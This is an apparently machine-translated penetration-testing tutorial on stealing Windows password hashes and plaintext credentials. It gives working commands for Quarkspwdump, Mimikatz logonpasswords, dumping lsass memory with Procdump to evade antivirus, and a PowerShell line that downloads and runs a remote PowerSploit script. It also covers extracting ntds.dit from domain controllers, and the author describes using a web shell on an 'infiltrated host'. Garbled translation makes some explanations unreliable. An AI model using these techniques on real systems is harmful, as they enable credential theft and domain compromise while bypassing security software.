0x01 Windows password Hash
The early SMB protocol transmits plaintext passwords over the network. Later, the "LAN Manager challenge/response" authentication mechanism, called LM, is so simple that it can be easily cracked. Microsoft has proposed a WindowsNT challenge/response verification mechanism, called NTLM. There is now an updated NTLMV2 and Kerberos authentication system. Windows encrypted passwords password, we call it hash (Chinese: hash), Windows system password hash By default generally consists of two parts: the first part is Lm-hash, the second part is Ntlm-hash.
Ntlm-hash and Lm-hash algorithm, clear text password case sensitive, but not according to Ntlm-hash determine whether the original plaintext password is less than 8 bytes, get rid of the magic string "[email protected]#$%". MD4 is a true one-way hash function, which is more difficult for the data source to appear in clear text. The problem is that Microsoft insists that Ntlm-hash's strength is high, but to avoid the fact that, in order to maintain backward compatibility, ntlm-hash default is always used with Lm-hash. This means that Ntlm-hash's emphasis on higher is not safe, but potentially damaging to security. After adding Ntlm-hash, first use Lm-hash's weaknesses to cite the original plaintext password of the case-insensitive version, and then use Ntlm-hash to correct the original plaintext password case-sensitive version.
The hash password format under Windows system is: User name: Rid:lm-hash value: Nt-hash value, for example: Administrator:500:c8825db10f2590eaaad3b435b51404ee : 683020925c5d8569c23aa724774ce6cc::: Indicates
User name is: Administrator
RID is: 500
The Lm-hash value is: C8825db10f2590eaaad3b435b51404ee
The Nt-hash value is: 683020925c5d8569c23aa724774ce6cc
If you know the user's hash password, take the c8825db10f2590eaaad3b435b51404ee:683020925c5d8569c23aa724774ce6cc to hash online search site.
0x02 Quarkspwdump
Generally use QUARKSPWDUMP_V0.2B to crawl the entire Windows series of password hash, will get the hash value in http://www.objectif-securite.ch/ophcrack.php query.
Quarkspwdump the command to crawl the password is as follows: (other commands can refer to the software description)
Quarkspwdump.exe-dhl
Get the entire hash value taken to hack online.
0x03 Mimikatz
Password grabber artifact Mimikatz to test, command as follows:
Privilege::d Ebug
Sekurlsa::logonpasswords
The results of the diagram are as follows:
have found, Mimikatz and Quarkspwdump crawl Lm-hash is different, and Mimikatz directly to the system password to take. Nt-hash two software gets the same result.
In the penetration testing process will appear this scenario, I have chopper connected to the other host, but the system installed by default 360 security guard or other security software. I uploaded the Mimikatz and quarkspwdump have been avira. That is to say, I want to use these two software conventional ideas to get the system's password hash is not likely. In fact, we can first dump the other host's lsass memory files, and then in their own host with Mimikatz processing, so you can get the other host system hash and password.
can go to the official website of Microsoft to download Prodump, this certainly will not cause anti-virus software to report poison and Avira.
The command is as follows:
Procdump.exe-accepteula-ma Lsass.exe Lsass.dmp
This is illustrated below:
Next, we will demonstrate the local use of Mimikatz to crack:
First enter the command:
" sekurlsa::minidump lsass.dmp "
Then enter the command:
Sekurlsa::logonpasswords
Can see, can get offline to get the system password, so you can bypass antivirus software on the other side of the killing.
In the cloud knowledge base, there are also commands to see the same work done with PowerShell in Prodump. The specific commands are as follows:
PowerShell IEX (New-object net.webclient). Downloadstring (' Https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1 '); "Get-process Lsass | Out-minidump "
I tried it on the infiltrated host and found it to be possible, but the chopper virtual terminal will show an error, and the PowerShell code has actually been executed successfully. But the overall feeling is still more convenient to use Prodump.
There are also integrated Mimkatz in the Metasploit. Specific tutorials can refer to Http://www.offensive-security.com/metasploit-unleashed/Mimikatz
0X04 Ntdsdump Related
Can't stand ntdsxtract turtle speed, so with Quarkspwdump changed a can read System.hiv offline version of the extraction tool.
Ntds.dit is actually a esent database, Microsoft itself has a series of documentation API to operate the database.
Its command line is as follows:
Ntdsdump.exe <-f ntds.dit> <-k Hex-sys-key | -S system.hiv> [-o out.txt] [-h] [-t john| LC]
-F Ntds.dit Path
-K optional hexadecimal format of SYSKEY
-S optional System.hiv path
-H Export History password record
-T export format, LC or John
-O export to the specified file
Syskey is actually the type information Hklm\system\currentcontrolset\control\lsa the following subkeys, which can be queried by RegQueryInfoKey.
The attachment provides two export tools, Getsyskey_c.exe compiled by VC6, its source code for Getsyskey.cpp, with the VC6 directly open the compilation can be.
Getsyskey_cs.exe compiled by. net2.0, source code for Getsyskey.cs, with CSC directly compiled.
Known error:
Jetattachdatabase () failed
Cause: The database needs to be repaired and executed esentutl/p/O Ntds.dit for repair.
:
Ntdsdump
Another: After the change and looked at Quarkspwdump's GitHub, found someone submitted a pull REQUEST:HTTPS://GITHUB.COM/QUARKSLAB/QUARKSPWDUMP/PULL/3
It adds a function to load the System.hiv, calling the RegLoadKey. And this API must be over UAC, so it is very awkward to use, as this directly read the file to deal with the happy.
Safe Pulse Posture
Export Ntds.dit, Sam, and system using Ntdsutil snapshot mount on the 2008+ domain control,
Ntdsutilsnapshotactivate Instance Ntdscreate Mount {guid}copy c:\MOUNT_POINT\WINDOWS\NTDS\NTDS.dit c:\NTDS_saved.ditunmount {Guid}quitquit Then it's all kinds of copy.
Use QuarksPwDump.exe to export most plaintext on domain control:
QuarksPwDump.exe--dump-hash-domain--output SecPulseHash.txt--ntds-file c:\ntds.dit
Download back to local re-use quarkspwdump doesn't seem to work, mainly because the system file cannot be specified locally, resulting in a key not being obtained
Attached quarks pwdump Use parameters:
Quarks-pwdump.exe <options>
Options:
-DHL--dump-hash-local
-DHDC--dump-hash-domain-cached
-DHD--dump-hash-domain (Ntds_file must be specified)
-db--dump-bitlocker (Ntds_file must be specified)
-nt--ntds-file File
-hist--with-history (optional)
-T--output-type john/lc (optional, if no=>john)
-O--output FILE (optional, if no=>stdout)
Example:quarks-pwdump.exe--dump-hash-domain--with-history
Of course, you can also download Ntds.dit, Sam and System back (many of the network NTDs are several g, download back not too scientific) with a tool to decrypt but it feels a bit large, now we can use NTDSDump.exe
Ntdsdump.exe-f ntds.dit-s System-o SecPulseHash.txt
0x05 Reference Links
Https://www.secpulse.com/archives/6301.html
Https://www.cnblogs.com/hiccup/p/4380298.html
about Windows System password fetching